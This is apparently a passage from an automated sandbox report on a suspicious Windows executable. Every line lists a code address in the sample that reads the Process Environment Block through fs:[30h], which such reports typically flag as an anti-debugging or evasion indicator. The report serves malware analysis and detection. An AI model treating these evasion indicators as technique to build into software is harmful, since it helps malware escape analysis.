        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289B360 mov eax, dword ptr fs:[00000030h]2_2_3289B360
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289B360 mov eax, dword ptr fs:[00000030h]2_2_3289B360
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289B360 mov eax, dword ptr fs:[00000030h]2_2_3289B360
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289B360 mov eax, dword ptr fs:[00000030h]2_2_3289B360
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE363 mov eax, dword ptr fs:[00000030h]2_2_328CE363
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B237A mov eax, dword ptr fs:[00000030h]2_2_328B237A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964080 mov eax, dword ptr fs:[00000030h]2_2_32964080
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288C090 mov eax, dword ptr fs:[00000030h]2_2_3288C090
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288A093 mov ecx, dword ptr fs:[00000030h]2_2_3288A093
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329650B7 mov eax, dword ptr fs:[00000030h]2_2_329650B7
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D00A5 mov eax, dword ptr fs:[00000030h]2_2_328D00A5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294B0AF mov eax, dword ptr fs:[00000030h]2_2_3294B0AF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AB0D0 mov eax, dword ptr fs:[00000030h]2_2_328AB0D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B0D6 mov eax, dword ptr fs:[00000030h]2_2_3288B0D6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B0D6 mov eax, dword ptr fs:[00000030h]2_2_3288B0D6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B0D6 mov eax, dword ptr fs:[00000030h]2_2_3288B0D6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288B0D6 mov eax, dword ptr fs:[00000030h]2_2_3288B0D6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328890F8 mov eax, dword ptr fs:[00000030h]2_2_328890F8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328890F8 mov eax, dword ptr fs:[00000030h]2_2_328890F8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328890F8 mov eax, dword ptr fs:[00000030h]2_2_328890F8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328890F8 mov eax, dword ptr fs:[00000030h]2_2_328890F8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CD0F0 mov eax, dword ptr fs:[00000030h]2_2_328CD0F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CD0F0 mov ecx, dword ptr fs:[00000030h]2_2_328CD0F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288C0F6 mov eax, dword ptr fs:[00000030h]2_2_3288C0F6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32898009 mov eax, dword ptr fs:[00000030h]2_2_32898009
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B5004 mov eax, dword ptr fs:[00000030h]2_2_328B5004
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B5004 mov ecx, dword ptr fs:[00000030h]2_2_328B5004
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D2010 mov ecx, dword ptr fs:[00000030h]2_2_328D2010
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288D02D mov eax, dword ptr fs:[00000030h]2_2_3288D02D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C0044 mov eax, dword ptr fs:[00000030h]2_2_328C0044
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3296505B mov eax, dword ptr fs:[00000030h]2_2_3296505B
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891051 mov eax, dword ptr fs:[00000030h]2_2_32891051
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32891051 mov eax, dword ptr fs:[00000030h]2_2_32891051
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32939060 mov eax, dword ptr fs:[00000030h]2_2_32939060
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32897072 mov eax, dword ptr fs:[00000030h]2_2_32897072
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32896074 mov eax, dword ptr fs:[00000030h]2_2_32896074
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32896074 mov eax, dword ptr fs:[00000030h]2_2_32896074
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32894180 mov eax, dword ptr fs:[00000030h]2_2_32894180
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32894180 mov eax, dword ptr fs:[00000030h]2_2_32894180
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32894180 mov eax, dword ptr fs:[00000030h]2_2_32894180
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1190 mov eax, dword ptr fs:[00000030h]2_2_328D1190
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328D1190 mov eax, dword ptr fs:[00000030h]2_2_328D1190
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B9194 mov eax, dword ptr fs:[00000030h]2_2_328B9194
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329651B6 mov eax, dword ptr fs:[00000030h]2_2_329651B6
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE1A4 mov eax, dword ptr fs:[00000030h]2_2_328CE1A4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CE1A4 mov eax, dword ptr fs:[00000030h]2_2_328CE1A4
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C31BE mov eax, dword ptr fs:[00000030h]2_2_328C31BE
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C31BE mov eax, dword ptr fs:[00000030h]2_2_328C31BE
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C41BB mov ecx, dword ptr fs:[00000030h]2_2_328C41BB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C41BB mov eax, dword ptr fs:[00000030h]2_2_328C41BB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C41BB mov eax, dword ptr fs:[00000030h]2_2_328C41BB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A01C0 mov eax, dword ptr fs:[00000030h]2_2_328A01C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A01C0 mov eax, dword ptr fs:[00000030h]2_2_328A01C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328881EB mov eax, dword ptr fs:[00000030h]2_2_328881EB
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BB1E0 mov eax, dword ptr fs:[00000030h]2_2_328BB1E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328991E5 mov eax, dword ptr fs:[00000030h]2_2_328991E5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328991E5 mov eax, dword ptr fs:[00000030h]2_2_328991E5
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328891F0 mov eax, dword ptr fs:[00000030h]2_2_328891F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328891F0 mov eax, dword ptr fs:[00000030h]2_2_328891F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329581EE mov eax, dword ptr fs:[00000030h]2_2_329581EE
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329581EE mov eax, dword ptr fs:[00000030h]2_2_329581EE
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A01F1 mov eax, dword ptr fs:[00000030h]2_2_328A01F1
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A01F1 mov eax, dword ptr fs:[00000030h]2_2_328A01F1
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A01F1 mov eax, dword ptr fs:[00000030h]2_2_328A01F1
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF1F0 mov eax, dword ptr fs:[00000030h]2_2_328BF1F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BF1F0 mov eax, dword ptr fs:[00000030h]2_2_328BF1F0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B510F mov eax, dword ptr fs:[00000030h]2_2_328B510F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289510D mov eax, dword ptr fs:[00000030h]2_2_3289510D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C0118 mov eax, dword ptr fs:[00000030h]2_2_328C0118
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288F113 mov eax, dword ptr fs:[00000030h]2_2_3288F113
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291A130 mov eax, dword ptr fs:[00000030h]2_2_3291A130
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C7128 mov eax, dword ptr fs:[00000030h]2_2_328C7128
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C7128 mov eax, dword ptr fs:[00000030h]2_2_328C7128
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F13E mov eax, dword ptr fs:[00000030h]2_2_3294F13E
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32963157 mov eax, dword ptr fs:[00000030h]2_2_32963157
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32963157 mov eax, dword ptr fs:[00000030h]2_2_32963157
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32963157 mov eax, dword ptr fs:[00000030h]2_2_32963157
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288A147 mov eax, dword ptr fs:[00000030h]2_2_3288A147
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288A147 mov eax, dword ptr fs:[00000030h]2_2_3288A147
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288A147 mov eax, dword ptr fs:[00000030h]2_2_3288A147
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C415F mov eax, dword ptr fs:[00000030h]2_2_328C415F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292314A mov eax, dword ptr fs:[00000030h]2_2_3292314A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292314A mov eax, dword ptr fs:[00000030h]2_2_3292314A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292314A mov eax, dword ptr fs:[00000030h]2_2_3292314A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3292314A mov eax, dword ptr fs:[00000030h]2_2_3292314A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32965149 mov eax, dword ptr fs:[00000030h]2_2_32965149
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C716D mov eax, dword ptr fs:[00000030h]2_2_328C716D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32896179 mov eax, dword ptr fs:[00000030h]2_2_32896179
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328E717A mov eax, dword ptr fs:[00000030h]2_2_328E717A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328E717A mov eax, dword ptr fs:[00000030h]2_2_328E717A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3291C691 mov eax, dword ptr fs:[00000030h]2_2_3291C691
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328A0680 mov eax, dword ptr fs:[00000030h]2_2_328A0680
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290D69D mov eax, dword ptr fs:[00000030h]2_2_3290D69D
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F68C mov eax, dword ptr fs:[00000030h]2_2_3294F68C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32898690 mov eax, dword ptr fs:[00000030h]2_2_32898690
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329586A8 mov eax, dword ptr fs:[00000030h]2_2_329586A8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_329586A8 mov eax, dword ptr fs:[00000030h]2_2_329586A8
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328906CF mov eax, dword ptr fs:[00000030h]2_2_328906CF
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3295A6C0 mov eax, dword ptr fs:[00000030h]2_2_3295A6C0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BD6D0 mov eax, dword ptr fs:[00000030h]2_2_328BD6D0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290C6F2 mov eax, dword ptr fs:[00000030h]2_2_3290C6F2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3290C6F2 mov eax, dword ptr fs:[00000030h]2_2_3290C6F2
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328896E0 mov eax, dword ptr fs:[00000030h]2_2_328896E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328896E0 mov eax, dword ptr fs:[00000030h]2_2_328896E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3289C6E0 mov eax, dword ptr fs:[00000030h]2_2_3289C6E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328956E0 mov eax, dword ptr fs:[00000030h]2_2_328956E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328956E0 mov eax, dword ptr fs:[00000030h]2_2_328956E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328956E0 mov eax, dword ptr fs:[00000030h]2_2_328956E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B66E0 mov eax, dword ptr fs:[00000030h]2_2_328B66E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328B66E0 mov eax, dword ptr fs:[00000030h]2_2_328B66E0
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C360F mov eax, dword ptr fs:[00000030h]2_2_328C360F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BD600 mov eax, dword ptr fs:[00000030h]2_2_328BD600
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328BD600 mov eax, dword ptr fs:[00000030h]2_2_328BD600
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3294F607 mov eax, dword ptr fs:[00000030h]2_2_3294F607
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32964600 mov eax, dword ptr fs:[00000030h]2_2_32964600
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32923608 mov eax, dword ptr fs:[00000030h]2_2_32923608
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32923608 mov eax, dword ptr fs:[00000030h]2_2_32923608
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32923608 mov eax, dword ptr fs:[00000030h]2_2_32923608
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32923608 mov eax, dword ptr fs:[00000030h]2_2_32923608
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32923608 mov eax, dword ptr fs:[00000030h]2_2_32923608
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32923608 mov eax, dword ptr fs:[00000030h]2_2_32923608
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32918633 mov esi, dword ptr fs:[00000030h]2_2_32918633
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32918633 mov eax, dword ptr fs:[00000030h]2_2_32918633
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32918633 mov eax, dword ptr fs:[00000030h]2_2_32918633
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32897623 mov eax, dword ptr fs:[00000030h]2_2_32897623
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32895622 mov eax, dword ptr fs:[00000030h]2_2_32895622
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32895622 mov eax, dword ptr fs:[00000030h]2_2_32895622
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CC620 mov eax, dword ptr fs:[00000030h]2_2_328CC620
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CF63F mov eax, dword ptr fs:[00000030h]2_2_328CF63F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CF63F mov eax, dword ptr fs:[00000030h]2_2_328CF63F
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32890630 mov eax, dword ptr fs:[00000030h]2_2_32890630
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328C0630 mov eax, dword ptr fs:[00000030h]2_2_328C0630
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3293D62C mov ecx, dword ptr fs:[00000030h]2_2_3293D62C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3293D62C mov ecx, dword ptr fs:[00000030h]2_2_3293D62C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3293D62C mov eax, dword ptr fs:[00000030h]2_2_3293D62C
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288D64A mov eax, dword ptr fs:[00000030h]2_2_3288D64A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_3288D64A mov eax, dword ptr fs:[00000030h]2_2_3288D64A
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_32893640 mov eax, dword ptr fs:[00000030h]2_2_32893640
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF640 mov eax, dword ptr fs:[00000030h]2_2_328AF640
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF640 mov eax, dword ptr fs:[00000030h]2_2_328AF640
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328AF640 mov eax, dword ptr fs:[00000030h]2_2_328AF640
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CC640 mov eax, dword ptr fs:[00000030h]2_2_328CC640
        Source: C:\Users\user\Desktop\U6SJBLxT2Z.exeCode function: 2_2_328CC640 mov eax, dword ptr fs:[00000030h]2_2_328CC640
